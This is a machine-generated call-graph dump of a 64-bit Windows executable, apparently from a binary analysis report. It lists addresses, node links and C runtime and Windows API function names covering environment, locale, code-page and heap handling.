API calls 17548->17552 17553 7ff6404f42b2 17549->17553 17558 7ff6404f4178 17550->17558 17554 7ff6404f4272 17552->17554 17556 7ff6404f9bf0 _invalid_parameter_noinfo 37 API calls 17553->17556 17554->17456 17555->17456 17557 7ff6404f42bd 17556->17557 17557->17456 17559 7ff6404f419c 17558->17559 17560 7ff6404f4197 17558->17560 17559->17560 17561 7ff6404fa460 _CreateFrameInfo 45 API calls 17559->17561 17560->17557 17562 7ff6404f41b7 17561->17562 17566 7ff6404fcc94 17562->17566 17575 7ff6404e3ae6 17574->17575 17638 7ff6404ebe12 RtlLookupFunctionEntry 17637->17638 17639 7ff6404ebc2b 17638->17639 17640 7ff6404ebe28 RtlVirtualUnwind 17638->17640 17641 7ff6404ebbc0 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 17639->17641 17640->17638 17640->17639 17643 7ff6404f51d8 17642->17643 17644 7ff6404f51fe 17643->17644 17647 7ff6404f5231 17643->17647 17645 7ff6404f43f4 _set_fmode 11 API calls 17644->17645 17646 7ff6404f5203 17645->17646 17648 7ff6404f9bf0 _invalid_parameter_noinfo 37 API calls 17646->17648 17649 7ff6404f5244 17647->17649 17650 7ff6404f5237 17647->17650 17653 7ff6404e3fc6 17648->17653 17661 7ff6404f9f38 17649->17661 17651 7ff6404f43f4 _set_fmode 11 API calls 17650->17651 17651->17653 17653->16223 17674 7ff6404ff5e8 EnterCriticalSection 17661->17674 18034 7ff6404f6c08 18033->18034 18037 7ff6404f66e4 18034->18037 18036 7ff6404f6c21 18036->16231 18038 7ff6404f672e 18037->18038 18039 7ff6404f66ff 18037->18039 18047 7ff6404f477c EnterCriticalSection 18038->18047 18041 7ff6404f9b24 _invalid_parameter_noinfo 37 API calls 18039->18041 18046 7ff6404f671f 18041->18046 18046->18036 18049 7ff6404ef163 18048->18049 18051 7ff6404ef191 18048->18051 18050 7ff6404f9b24 _invalid_parameter_noinfo 37 API calls 18049->18050 18052 7ff6404ef183 18050->18052 18051->18052 18058 7ff6404f477c EnterCriticalSection 18051->18058 18052->16237 18060 7ff6404e86b0 2 API calls 18059->18060 18061 7ff6404e81b4 LoadLibraryExW 18060->18061 18062 7ff6404e81d3 __std_exception_destroy 18061->18062 18062->16267 18064 7ff6404e6ef3 GetProcAddress 18063->18064 18065 7ff6404e6ec9 18063->18065 18064->18065 18066 7ff6404e6f18 GetProcAddress 18064->18066 18067 7ff6404e29e0 51 API calls 18065->18067 18066->18065 18068 7ff6404e6f3d GetProcAddress 18066->18068 18069 7ff6404e6ee3 18067->18069 18068->18065 18069->16274 18129 7ff6404e5b05 18128->18129 18130 7ff6404e1bf0 49 API calls 18129->18130 18131 7ff6404e5b41 18130->18131 18132 7ff6404e5b4a 18131->18132 18133 7ff6404e5b6d 18131->18133 18134 7ff6404e25f0 53 API calls 18132->18134 18135 7ff6404e3fe0 49 API calls 18133->18135 18152 7ff6404e5b63 18134->18152 18136 7ff6404e5b85 18135->18136 18137 7ff6404e5ba3 18136->18137 18138 7ff6404e25f0 53 API calls 18136->18138 18139 7ff6404e3f10 10 API calls 18137->18139 18138->18137 18141 7ff6404e5bad 18139->18141 18140 7ff6404eb870 _log10_special 8 API calls 18142 7ff6404e308e 18140->18142 18143 7ff6404e5bbb 18141->18143 18144 7ff6404e81a0 3 API calls 18141->18144 18142->16302 18159 7ff6404e5c80 18142->18159 18145 7ff6404e3fe0 49 API calls 18143->18145 18144->18143 18146 7ff6404e5bd4 18145->18146 18147 7ff6404e5bf9 18146->18147 18148 7ff6404e5bd9 18146->18148 18150 7ff6404e81a0 3 API calls 18147->18150 18149 7ff6404e25f0 53 API calls 18148->18149 18149->18152 18151 7ff6404e5c06 18150->18151 18152->18140 18298 7ff6404e4c80 18159->18298 18161 7ff6404e5cba 18162 7ff6404e5cd3 18161->18162 18163 7ff6404e5cc2 18161->18163 18305 7ff6404e4450 18162->18305 18165 7ff6404e25f0 53 API calls 18163->18165 18300 7ff6404e4cac 18298->18300 18299 7ff6404e4cb4 18299->18161 18300->18299 18303 7ff6404e4e54 18300->18303 18336 7ff6404f5db4 18300->18336 18301 7ff6404e5017 __std_exception_destroy 18301->18161 18302 7ff6404e4180 47 API calls 18302->18303 18303->18301 18303->18302 18306 7ff6404e4480 18305->18306 18337 7ff6404f5de4 18336->18337 18340 7ff6404f52b0 18337->18340 18341 7ff6404f52f3 18340->18341 18342 7ff6404f52e1 18340->18342 18344 7ff6404f533d 18341->18344 18347 7ff6404f5300 18341->18347 18343 7ff6404f43f4 _set_fmode 11 API calls 18342->18343 18416->16310 18418 7ff6404fa460 _CreateFrameInfo 45 API calls 18417->18418 18419 7ff6404f96f1 18418->18419 18422 7ff6404f9814 18419->18422 18431 7ff640502960 18422->18431 18457 7ff640502918 18431->18457 18462 7ff6404ff5e8 EnterCriticalSection 18457->18462 18687 7ff6404ffbd8 18688 7ff6404ffbfc 18687->18688 18690 7ff6404ffc0c 18687->18690 18689 7ff6404f43f4 _set_fmode 11 API calls 18688->18689 18712 7ff6404ffc01 18689->18712 18691 7ff6404ffeec 18690->18691 18692 7ff6404ffc2e 18690->18692 18693 7ff6404f43f4 _set_fmode 11 API calls 18691->18693 18694 7ff6404ffc4f 18692->18694 18818 7ff640500294 18692->18818 18695 7ff6404ffef1 18693->18695 18698 7ff6404ffcc1 18694->18698 18700 7ff6404ffc75 18694->18700 18707 7ff6404ffcb5 18694->18707 18697 7ff6404f9c58 __free_lconv_num 11 API calls 18695->18697 18697->18712 18703 7ff6404fdea8 _set_fmode 11 API calls 18698->18703 18716 7ff6404ffc84 18698->18716 18699 7ff6404ffd6e 18711 7ff6404ffd8b 18699->18711 18717 7ff6404ffddd 18699->18717 18833 7ff6404f89d8 18700->18833 18704 7ff6404ffcd7 18703->18704 18708 7ff6404f9c58 __free_lconv_num 11 API calls 18704->18708 18706 7ff6404f9c58 __free_lconv_num 11 API calls 18706->18712 18707->18699 18707->18716 18839 7ff64050643c 18707->18839 18713 7ff6404ffce5 18708->18713 18709 7ff6404ffc7f 18714 7ff6404f43f4 _set_fmode 11 API calls 18709->18714 18710 7ff6404ffc9d 18710->18707 18719 7ff640500294 45 API calls 18710->18719 18715 7ff6404f9c58 __free_lconv_num 11 API calls 18711->18715 18713->18707 18713->18716 18721 7ff6404fdea8 _set_fmode 11 API calls 18713->18721 18714->18716 18718 7ff6404ffd94 18715->18718 18716->18706 18717->18716 18720 7ff6405026ec 40 API calls 18717->18720 18729 7ff6404ffd99 18718->18729 18875 7ff6405026ec 18718->18875 18719->18707 18722 7ff6404ffe1a 18720->18722 18723 7ff6404ffd07 18721->18723 18724 7ff6404f9c58 __free_lconv_num 11 API calls 18722->18724 18726 7ff6404f9c58 __free_lconv_num 11 API calls 18723->18726 18727 7ff6404ffe24 18724->18727 18726->18707 18727->18716 18727->18729 18728 7ff6404ffee0 18732 7ff6404f9c58 __free_lconv_num 11 API calls 18728->18732 18729->18728 18733 7ff6404fdea8 _set_fmode 11 API calls 18729->18733 18730 7ff6404ffdc5 18731 7ff6404f9c58 __free_lconv_num 11 API calls 18730->18731 18731->18729 18732->18712 18734 7ff6404ffe68 18733->18734 18735 7ff6404ffe70 18734->18735 18736 7ff6404ffe79 18734->18736 18737 7ff6404f9c58 __free_lconv_num 11 API calls 18735->18737 18738 7ff6404f97b4 __std_exception_copy 37 API calls 18736->18738 18739 7ff6404ffe77 18737->18739 18740 7ff6404ffe88 18738->18740 18744 7ff6404f9c58 __free_lconv_num 11 API calls 18739->18744 18741 7ff6404ffe90 18740->18741 18742 7ff6404fff1b 18740->18742 18884 7ff640506554 18741->18884 18743 7ff6404f9c10 _isindst 17 API calls 18742->18743 18746 7ff6404fff2f 18743->18746 18744->18712 18748 7ff6404fff58 18746->18748 18756 7ff6404fff68 18746->18756 18751 7ff6404f43f4 _set_fmode 11 API calls 18748->18751 18749 7ff6404ffed8 18752 7ff6404f9c58 __free_lconv_num 11 API calls 18749->18752 18750 7ff6404ffeb7 18753 7ff6404f43f4 _set_fmode 11 API calls 18750->18753 18780 7ff6404fff5d 18751->18780 18752->18728 18754 7ff6404ffebc 18753->18754 18755 7ff6404f9c58 __free_lconv_num 11 API calls 18754->18755 18755->18739 18757 7ff64050024b 18756->18757 18758 7ff6404fff8a 18756->18758 18759 7ff6404f43f4 _set_fmode 11 API calls 18757->18759 18760 7ff6404fffa7 18758->18760 18903 7ff64050037c 18758->18903 18761 7ff640500250 18759->18761 18764 7ff64050001b 18760->18764 18765 7ff6404fffcf 18760->18765 18770 7ff64050000f 18760->18770 18763 7ff6404f9c58 __free_lconv_num 11 API calls 18761->18763 18763->18780 18768 7ff640500043 18764->18768 18771 7ff6404fdea8 _set_fmode 11 API calls 18764->18771 18785 7ff6404fffde 18764->18785 18918 7ff6404f8a14 18765->18918 18766 7ff6405000ce 18779 7ff6405000eb 18766->18779 18786 7ff64050013e 18766->18786 18768->18770 18773 7ff6404fdea8 _set_fmode 11 API calls 18768->18773 18768->18785 18770->18766 18770->18785 18924 7ff6405062fc 18770->18924 18775 7ff640500035 18771->18775 18778 7ff640500065 18773->18778 18774 7ff6404f9c58 __free_lconv_num 11 API calls 18774->18780 18781 7ff6404f9c58 __free_lconv_num 11 API calls 18775->18781 18776 7ff6404fffd9 18782 7ff6404f43f4 _set_fmode 11 API calls 18776->18782 18777 7ff6404ffff7 18777->18770 18788 7ff64050037c 45 API calls 18777->18788 18783 7ff6404f9c58 __free_lconv_num 11 API calls 18778->18783 18784 7ff6404f9c58 __free_lconv_num 11 API calls 18779->18784 18781->18768 18782->18785 18783->18770 18787 7ff6405000f4 18784->18787 18785->18774 18786->18785 18789 7ff6405026ec 40 API calls 18786->18789 18791 7ff6405026ec 40 API calls 18787->18791 18794 7ff6405000fa 18787->18794 18788->18770 18790 7ff64050017c 18789->18790 18792 7ff6404f9c58 __free_lconv_num 11 API calls 18790->18792 18795 7ff640500126 18791->18795 18796 7ff640500186 18792->18796 18793 7ff64050023f 18798 7ff6404f9c58 __free_lconv_num 11 API calls 18793->18798 18794->18793 18799 7ff6404fdea8 _set_fmode 11 API calls 18794->18799 18797 7ff6404f9c58 __free_lconv_num 11 API calls 18795->18797 18796->18785 18796->18794 18797->18794 18798->18780 18800 7ff6405001cb 18799->18800 18801 7ff6405001d3 18800->18801 18802 7ff6405001dc 18800->18802 18803 7ff6404f9c58 __free_lconv_num 11 API calls 18801->18803 18804 7ff6404ff784 37 API calls 18802->18804 18805 7ff6405001da 18803->18805 18806 7ff6405001ea 18804->18806 18810 7ff6404f9c58 __free_lconv_num 11 API calls 18805->18810 18807 7ff6405001f2 SetEnvironmentVariableW 18806->18807 18808 7ff64050027f 18806->18808 18811 7ff640500237 18807->18811 18812 7ff640500216 18807->18812 18809 7ff6404f9c10 _isindst 17 API calls 18808->18809 18813 7ff640500293 18809->18813 18810->18780 18814 7ff6404f9c58 __free_lconv_num 11 API calls 18811->18814 18815 7ff6404f43f4 _set_fmode 11 API calls 18812->18815 18814->18793 18816 7ff64050021b 18815->18816 18817 7ff6404f9c58 __free_lconv_num 11 API calls 18816->18817 18817->18805 18819 7ff6405002b1 18818->18819 18820 7ff6405002c9 18818->18820 18819->18694 18821 7ff6404fdea8 _set_fmode 11 API calls 18820->18821 18826 7ff6405002ed 18821->18826 18822 7ff6404f9814 _CreateFrameInfo 45 API calls 18824 7ff640500378 18822->18824 18823 7ff64050034e 18825 7ff6404f9c58 __free_lconv_num 11 API calls 18823->18825 18825->18819 18826->18823 18827 7ff6404fdea8 _set_fmode 11 API calls 18826->18827 18828 7ff6404f9c58 __free_lconv_num 11 API calls 18826->18828 18829 7ff6404f97b4 __std_exception_copy 37 API calls 18826->18829 18830 7ff64050035d 18826->18830 18832 7ff640500372 18826->18832 18827->18826 18828->18826 18829->18826 18831 7ff6404f9c10 _isindst 17 API calls 18830->18831 18831->18832 18832->18822 18834 7ff6404f89f1 18833->18834 18835 7ff6404f89e8 18833->18835 18834->18709 18834->18710 18835->18834 18948 7ff6404f84b0 18835->18948 18840 7ff640505564 18839->18840 18841 7ff640506449 18839->18841 18842 7ff640505571 18840->18842 18849 7ff6405055a7 18840->18849 18843 7ff6404f4178 45 API calls 18841->18843 18846 7ff6404f43f4 _set_fmode 11 API calls 18842->18846 18862 7ff640505518 18842->18862 18845 7ff64050647d 18843->18845 18844 7ff6405055d1 18848 7ff6404f43f4 _set_fmode 11 API calls 18844->18848 18850 7ff640506482 18845->18850 18854 7ff640506493 18845->18854 18858 7ff6405064aa 18845->18858 18847 7ff64050557b 18846->18847 18851 7ff6404f9bf0 _invalid_parameter_noinfo 37 API calls 18847->18851 18852 7ff6405055d6 18848->18852 18849->18844 18853 7ff6405055f6 18849->18853 18850->18707 18856 7ff640505586 18851->18856 18857 7ff6404f9bf0 _invalid_parameter_noinfo 37 API calls 18852->18857 18863 7ff6404f4178 45 API calls 18853->18863 18864 7ff6405055e1 18853->18864 18855 7ff6404f43f4 _set_fmode 11 API calls 18854->18855 18859 7ff640506498 18855->18859 18856->18707 18857->18864 18860 7ff6405064b4 18858->18860 18861 7ff6405064c6 18858->18861 18865 7ff6404f9bf0 _invalid_parameter_noinfo 37 API calls 18859->18865 18866 7ff6404f43f4 _set_fmode 11 API calls 18860->18866 18867 7ff6405064ee 18861->18867 18868 7ff6405064d7 18861->18868 18862->18707 18863->18864 18864->18707 18865->18850 18869 7ff6405064b9 18866->18869 19180 7ff64050825c 18867->19180 19171 7ff6405055b4 18868->19171 18873 7ff6404f9bf0 _invalid_parameter_noinfo 37 API calls 18869->18873 18873->18850 18874 7ff6404f43f4 _set_fmode 11 API calls 18874->18850 18876 7ff64050270e 18875->18876 18877 7ff64050272b 18875->18877 18876->18877 18879 7ff64050271c 18876->18879 18878 7ff640502735 18877->18878 19220 7ff640506f48 18877->19220 19227 7ff640506f84 18878->19227 18880 7ff6404f43f4 _set_fmode 11 API calls 18879->18880 18883 7ff640502721 memcpy_s 18880->18883 18883->18730 18885 7ff6404f4178 45 API calls 18884->18885 18886 7ff6405065ba 18885->18886 18887 7ff6405065c8 18886->18887 19239 7ff6404fe234 18886->19239 19242 7ff6404f47bc 18887->19242 18891 7ff6405066b4 18894 7ff6404f9c58 __free_lconv_num 11 API calls 18891->18894 18896 7ff6405066c5 18891->18896 18892 7ff6404f4178 45 API calls 18893 7ff640506637 18892->18893 18897 7ff6404fe234 5 API calls 18893->18897 18900 7ff640506640 18893->18900 18894->18896 18895 7ff6404ffeb3 18895->18749 18895->18750 18896->18895 18898 7ff6404f9c58 __free_lconv_num 11 API calls 18896->18898 18897->18900 18898->18895 18899 7ff6404f47bc 14 API calls 18901 7ff64050669b 18899->18901 18900->18899 18901->18891 18902 7ff6405066a3 SetEnvironmentVariableW 18901->18902 18902->18891 18904 7ff64050039f 18903->18904 18905 7ff6405003bc 18903->18905 18904->18760 18906 7ff6404fdea8 _set_fmode 11 API calls 18905->18906 18912 7ff6405003e0 18906->18912 18907 7ff640500441 18910 7ff6404f9c58 __free_lconv_num 11 API calls 18907->18910 18908 7ff6404f9814 _CreateFrameInfo 45 API calls 18909 7ff64050046a 18908->18909 18910->18904 18911 7ff6404fdea8 _set_fmode 11 API calls 18911->18912 18912->18907 18912->18911 18913 7ff6404f9c58 __free_lconv_num 11 API calls 18912->18913 18914 7ff6404ff784 37 API calls 18912->18914 18915 7ff640500450 18912->18915 18917 7ff640500464 18912->18917 18913->18912 18914->18912 18916 7ff6404f9c10 _isindst 17 API calls 18915->18916 18916->18917 18917->18908 18919 7ff6404f8a24 18918->18919 18920 7ff6404f8a2d 18918->18920 18919->18920 19264 7ff6404f8524 18919->19264 18920->18776 18920->18777 18925 7ff640506309 18924->18925 18928 7ff640506336 18924->18928 18926 7ff64050630e 18925->18926 18925->18928 18927 7ff6404f43f4 _set_fmode 11 API calls 18926->18927 18930 7ff640506313 18927->18930 18929 7ff64050637a 18928->18929 18932 7ff640506399 18928->18932 18946 7ff64050636e __crtLCMapStringW 18928->18946 18931 7ff6404f43f4 _set_fmode 11 API calls 18929->18931 18933 7ff6404f9bf0 _invalid_parameter_noinfo 37 API calls 18930->18933 18934 7ff64050637f 18931->18934 18935 7ff6405063b5 18932->18935 18936 7ff6405063a3 18932->18936 18937 7ff64050631e 18933->18937 18939 7ff6404f9bf0 _invalid_parameter_noinfo 37 API calls 18934->18939 18938 7ff6404f4178 45 API calls 18935->18938 18940 7ff6404f43f4 _set_fmode 11 API calls 18936->18940 18937->18770 18941 7ff6405063c2 18938->18941 18939->18946 18942 7ff6405063a8 18940->18942 18941->18946 19311 7ff640507e18 18941->19311 18943 7ff6404f9bf0 _invalid_parameter_noinfo 37 API calls 18942->18943 18943->18946 18946->18770 18947 7ff6404f43f4 _set_fmode 11 API calls 18947->18946 18949 7ff6404f84c5 18948->18949 18950 7ff6404f84c9 18948->18950 18949->18834 18963 7ff6404f8804 18949->18963 18971 7ff640501900 18950->18971 18955 7ff6404f84db 18957 7ff6404f9c58 __free_lconv_num 11 API calls 18955->18957 18956 7ff6404f84e7 18997 7ff6404f8594 18956->18997 18957->18949 18960 7ff6404f9c58 __free_lconv_num 11 API calls 18961 7ff6404f850e 18960->18961 18962 7ff6404f9c58 __free_lconv_num 11 API calls 18961->18962 18962->18949 18964 7ff6404f882d 18963->18964 18969 7ff6404f8846 18963->18969 18964->18834 18965 7ff6404fdea8 _set_fmode 11 API calls 18965->18969 18966 7ff6404f88d6 18968 7ff6404f9c58 __free_lconv_num 11 API calls 18966->18968 18967 7ff6404ffaf8 WideCharToMultiByte 18967->18969 18968->18964 18969->18964 18969->18965 18969->18966 18969->18967 18970 7ff6404f9c58 __free_lconv_num 11 API calls 18969->18970 18970->18969 18972 7ff64050190d 18971->18972 18973 7ff6404f84ce 18971->18973 19016 7ff6404fa534 18972->19016 18977 7ff640501c3c GetEnvironmentStringsW 18973->18977 18978 7ff6404f84d3 18977->18978 18979 7ff640501c6c 18977->18979 18978->18955 18978->18956 18980 7ff6404ffaf8 WideCharToMultiByte 18979->18980 18981 7ff640501cbd 18980->18981 18982 7ff640501cc4 FreeEnvironmentStringsW 18981->18982 18983 7ff6404fc90c _fread_nolock 12 API calls 18981->18983 18982->18978 18984 7ff640501cd7 18983->18984 18985 7ff640501cdf 18984->18985 18986 7ff640501ce8 18984->18986 18987 7ff6404f9c58 __free_lconv_num 11 API calls 18985->18987 18988 7ff6404ffaf8 WideCharToMultiByte 18986->18988 18989 7ff640501ce6 18987->18989 18990 7ff640501d0b 18988->18990 18989->18982 18991 7ff640501d0f 18990->18991 18992 7ff640501d19 18990->18992 18994 7ff6404f9c58 __free_lconv_num 11 API calls 18991->18994 18993 7ff6404f9c58 __free_lconv_num 11 API calls 18992->18993 18995 7ff640501d17 FreeEnvironmentStringsW 18993->18995 18994->18995 18995->18978 18998 7ff6404f85b9 18997->18998 18999 7ff6404fdea8 _set_fmode 11 API calls 18998->18999 19011 7ff6404f85ef 18999->19011 19000 7ff6404f85f7 19001 7ff6404f9c58 __free_lconv_num 11 API calls 19000->19001 19002 7ff6404f84ef 19001->19002 19002->18960 19003 7ff6404f866a 19004 7ff6404f9c58 __free_lconv_num 11 API calls 19003->19004 19004->19002 19005 7ff6404fdea8 _set_fmode 11 API calls 19005->19011 19006 7ff6404f8659 19165 7ff6404f87c0 19006->19165 19007 7ff6404f97b4 __std_exception_copy 37 API calls 19007->19011 19010 7ff6404f868f 19013 7ff6404f9c10 _isindst 17 API calls 19010->19013 19011->19000 19011->19003 19011->19005 19011->19006 19011->19007 19011->19010 19014 7ff6404f9c58 __free_lconv_num 11 API calls 19011->19014 19012 7ff6404f9c58 __free_lconv_num 11 API calls 19012->19000 19015 7ff6404f86a2 19013->19015 19014->19011 19017 7ff6404fa545 FlsGetValue 19016->19017 19018 7ff6404fa560 FlsSetValue 19016->19018 19019 7ff6404fa552 19017->19019 19020 7ff6404fa55a 19017->19020 19018->19019 19021 7ff6404fa56d 19018->19021 19022 7ff6404fa558 19019->19022 19023 7ff6404f9814 _CreateFrameInfo 45 API calls 19019->19023 19020->19018 19024 7ff6404fdea8 _set_fmode 11 API calls 19021->19024 19036 7ff6405015d4 19022->19036 19026 7ff6404fa5d5 19023->19026 19025 7ff6404fa57c 19024->19025 19027 7ff6404fa59a FlsSetValue 19025->19027 19028 7ff6404fa58a FlsSetValue 19025->19028 19030 7ff6404fa5b8 19027->19030 19031 7ff6404fa5a6 FlsSetValue 19027->19031 19029 7ff6404fa593 19028->19029 19032 7ff6404f9c58 __free_lconv_num 11 API calls 19029->19032 19033 7ff6404fa204 _set_fmode 11 API calls 19030->19033 19031->19029 19032->19019 19034 7ff6404fa5c0 19033->19034 19035 7ff6404f9c58 __free_lconv_num 11 API calls 19034->19035 19035->19022 19059 7ff640501844 19036->19059 19038 7ff640501609 19074 7ff6405012d4 19038->19074 19041 7ff640501626 19041->18973 19042 7ff6404fc90c _fread_nolock 12 API calls 19043 7ff640501637 19042->19043 19044 7ff64050163f 19043->19044 19046 7ff64050164e 19043->19046 19045 7ff6404f9c58 __free_lconv_num 11 API calls 19044->19045 19045->19041 19046->19046 19081 7ff64050197c 19046->19081 19049 7ff64050174a 19050 7ff6404f43f4 _set_fmode 11 API calls 19049->19050 19051 7ff64050174f 19050->19051 19053 7ff6404f9c58 __free_lconv_num 11 API calls 19051->19053 19052 7ff6405017a5 19055 7ff64050180c 19052->19055 19092 7ff640501104 19052->19092 19053->19041 19054 7ff640501764 19054->19052 19057 7ff6404f9c58 __free_lconv_num 11 API calls 19054->19057 19056 7ff6404f9c58 __free_lconv_num 11 API calls 19055->19056 19056->19041 19057->19052 19060 7ff640501867 19059->19060 19061 7ff640501871 19060->19061 19107 7ff6404ff5e8 EnterCriticalSection 19060->19107 19063 7ff6405018e3 19061->19063 19066 7ff6404f9814 _CreateFrameInfo 45 API calls 19061->19066 19063->19038 19067 7ff6405018fb 19066->19067 19069 7ff640501952 19067->19069 19071 7ff6404fa534 50 API calls 19067->19071 19069->19038 19072 7ff64050193c 19071->19072 19073 7ff6405015d4 65 API calls 19072->19073 19073->19069 19075 7ff6404f4178 45 API calls 19074->19075 19076 7ff6405012e8 19075->19076 19077 7ff6405012f4 GetOEMCP 19076->19077 19078 7ff640501306 19076->19078 19079 7ff64050131b 19077->19079 19078->19079 19080 7ff64050130b GetACP 19078->19080 19079->19041 19079->19042 19080->19079 19082 7ff6405012d4 47 API calls 19081->19082 19083 7ff6405019a9 19082->19083 19084 7ff640501aff 19083->19084 19085 7ff6405019e6 IsValidCodePage 19083->19085 19091 7ff640501a00 memcpy_s 19083->19091 19086 7ff6404eb870 _log10_special 8 API calls 19084->19086 19085->19084 19087 7ff6405019f7 19085->19087 19088 7ff640501741 19086->19088 19089 7ff640501a26 GetCPInfo 19087->19089 19087->19091 19088->19049 19088->19054 19089->19084 19089->19091 19108 7ff6405013ec 19091->19108 19164 7ff6404ff5e8 EnterCriticalSection 19092->19164 19109 7ff640501429 GetCPInfo 19108->19109 19118 7ff64050151f 19108->19118 19114 7ff64050143c 19109->19114 19109->19118 19110 7ff6404eb870 _log10_special 8 API calls 19111 7ff6405015be 19110->19111 19111->19084 19112 7ff640502150 48 API calls 19113 7ff6405014b3 19112->19113 19119 7ff640506e94 19113->19119 19114->19112 19117 7ff640506e94 54 API calls 19117->19118 19118->19110 19120 7ff6404f4178 45 API calls 19119->19120 19121 7ff640506eb9 19120->19121 19124 7ff640506b60 19121->19124 19125 7ff640506ba1 19124->19125 19126 7ff6404febb0 _fread_nolock MultiByteToWideChar 19125->19126 19129 7ff640506beb 19126->19129 19127 7ff640506e69 19128 7ff6404eb870 _log10_special 8 API calls 19127->19128 19130 7ff6405014e6 19128->19130 19129->19127 19131 7ff6404fc90c _fread_nolock 12 API calls 19129->19131 19133 7ff640506c23 19129->19133 19144 7ff640506d21 19129->19144 19130->19117 19131->19133 19132 7ff6404f9c58 __free_lconv_num 11 API calls 19132->19127 19134 7ff6404febb0 _fread_nolock MultiByteToWideChar 19133->19134 19133->19144 19135 7ff640506c96 19134->19135 19135->19144 19155 7ff6404fe3f4 19135->19155 19138 7ff640506d32 19140 7ff640506e04 19138->19140 19141 7ff6404fc90c _fread_nolock 12 API calls 19138->19141 19143 7ff640506d50 19138->19143 19139 7ff640506ce1 19142 7ff6404fe3f4 __crtLCMapStringW 6 API calls 19139->19142 19139->19144 19140->19144 19145 7ff6404f9c58 __free_lconv_num 11 API calls 19140->19145 19141->19143 19142->19144 19143->19144 19146 7ff6404fe3f4 __crtLCMapStringW 6 API calls 19143->19146 19144->19127 19144->19132 19145->19144 19147 7ff640506dd0 19146->19147 19147->19140 19148 7ff640506df0 19147->19148 19149 7ff640506e06 19147->19149 19151 7ff6404ffaf8 WideCharToMultiByte 19148->19151 19150 7ff6404ffaf8 WideCharToMultiByte 19149->19150 19152 7ff640506dfe 19150->19152 19151->19152 19152->19140 19153 7ff640506e1e 19152->19153 19153->19144 19154 7ff6404f9c58 __free_lconv_num 11 API calls 19153->19154 19154->19144 19156 7ff6404fe020 __crtLCMapStringW 5 API calls 19155->19156 19157 7ff6404fe432 19156->19157 19158 7ff6404fe43a 19157->19158 19161 7ff6404fe4e0 19157->19161 19158->19138 19158->19139 19158->19144 19160 7ff6404fe4a3 LCMapStringW 19160->19158 19162 7ff6404fe020 __crtLCMapStringW 5 API calls 19161->19162 19163 7ff6404fe50e __crtLCMapStringW 19162->19163 19163->19160 19166 7ff6404f87c5 19165->19166 19167 7ff6404f8661 19165->19167 19168 7ff6404f87ee 19166->19168 19169 7ff6404f9c58 __free_lconv_num 11 API calls 19166->19169 19167->19012 19170 7ff6404f9c58 __free_lconv_num 11 API calls 19168->19170 19169->19166 19170->19167 19172 7ff6405055d1 19171->19172 19173 7ff6405055e8 19171->19173 19174 7ff6404f43f4 _set_fmode 11 API calls 19172->19174 19173->19172 19176 7ff6405055f6 19173->19176 19175 7ff6405055d6 19174->19175 19177 7ff6404f9bf0 _invalid_parameter_noinfo 37 API calls 19175->19177 19178 7ff6404f4178 45 API calls 19176->19178 19179 7ff6405055e1 19176->19179 19177->19179 19178->19179 19179->18850 19181 7ff6404f4178 45 API calls 19180->19181 19182 7ff640508281 19181->19182 19185 7ff640507ed8 19182->19185 19187 7ff640507f26 19185->19187 19186 7ff6404eb870 _log10_special 8 API calls 19188 7ff640506515 19186->19188 19189 7ff640507fad 19187->19189 19191 7ff640507f98 GetCPInfo 19187->19191 19194 7ff640507fb1 19187->19194 19188->18850 19188->18874 19190 7ff6404febb0 _fread_nolock MultiByteToWideChar 19189->19190 19189->19194 19192 7ff640508045 19190->19192 19191->19189 19191->19194 19193 7ff6404fc90c _fread_nolock 12 API calls 19192->19193 19192->19194 19195 7ff64050807c 19192->19195 19193->19195 19194->19186 19195->19194 19196 7ff6404febb0 _fread_nolock MultiByteToWideChar 19195->19196 19197 7ff6405080ea 19196->19197 19198 7ff6405081cc 19197->19198 19199 7ff6404febb0 _fread_nolock MultiByteToWideChar 19197->19199 19198->19194 19200 7ff6404f9c58 __free_lconv_num 11 API calls 19198->19200 19201 7ff640508110 19199->19201 19200->19194 19201->19198 19202 7ff6404fc90c _fread_nolock 12 API calls 19201->19202 19203 7ff64050813d 19201->19203 19202->19203 19203->19198 19204 7ff6404febb0 _fread_nolock MultiByteToWideChar 19203->19204 19205 7ff6405081b4 19204->19205 19206 7ff6405081ba 19205->19206 19207 7ff6405081d4 19205->19207 19206->19198 19210 7ff6404f9c58 __free_lconv_num 11 API calls 19206->19210 19214 7ff6404fe278 19207->19214 19210->19198 19211 7ff640508213 19211->19194 19213 7ff6404f9c58 __free_lconv_num 11 API calls 19211->19213 19212 7ff6404f9c58 __free_lconv_num 11 API calls 19212->19211 19213->19194 19215 7ff6404fe020 __crtLCMapStringW 5 API calls 19214->19215 19216 7ff6404fe2b6 19215->19216 19217 7ff6404fe2be 19216->19217 19218 7ff6404fe4e0 __crtLCMapStringW 5 API calls 19216->19218 19217->19211 19217->19212 19219 7ff6404fe327 CompareStringW 19218->19219 19219->19217 19221 7ff640506f51 19220->19221 19222 7ff640506f6a HeapSize 19220->19222 19223 7ff6404f43f4 _set_fmode 11 API calls 19221->19223 19224 7ff640506f56 19223->19224 19225 7ff6404f9bf0 _invalid_parameter_noinfo 37 API calls 19224->19225 19226 7ff640506f61 19225->19226 19226->18878 19228 7ff640506fa3 19227->19228 19229 7ff640506f99 19227->19229 19231 7ff640506fa8 19228->19231 19237 7ff640506faf _set_fmode 19228->19237 19230 7ff6404fc90c _fread_nolock 12 API calls 19229->19230 19235 7ff640506fa1 19230->19235 19234 7ff6404f9c58 __free_lconv_num 11 API calls 19231->19234 19232 7ff640506fb5 19236 7ff6404f43f4 _set_fmode 11 API calls 19232->19236 19233 7ff640506fe2 HeapReAlloc 19233->19235 19233->19237 19234->19235 19235->18883 19236->19235 19237->19232 19237->19233 19238 7ff6405028a0 _set_fmode 2 API calls 19237->19238 19238->19237 19240 7ff6404fe020 __crtLCMapStringW 5 API calls 19239->19240 19241 7ff6404fe254 19240->19241 19241->18887 19243 7ff6404f480a 19242->19243 19244 7ff6404f47e6 19242->19244 19245 7ff6404f4864 19243->19245 19246 7ff6404f480f 19243->19246 19247 7ff6404f47f5 19244->19247 19249 7ff6404f9c58 __free_lconv_num 11 API calls 19244->19249 19248 7ff6404febb0 _fread_nolock MultiByteToWideChar 19245->19248 19246->19247 19250 7ff6404f4824 19246->19250 19251 7ff6404f9c58 __free_lconv_num 11 API calls 19246->19251 19247->18891 19247->18892 19255 7ff6404f4880 19248->19255 19249->19247 19252 7ff6404fc90c _fread_nolock 12 API calls 19250->19252 19251->19250 19252->19247 19253 7ff6404f4887 GetLastError 19254 7ff6404f4368 _fread_nolock 11 API calls 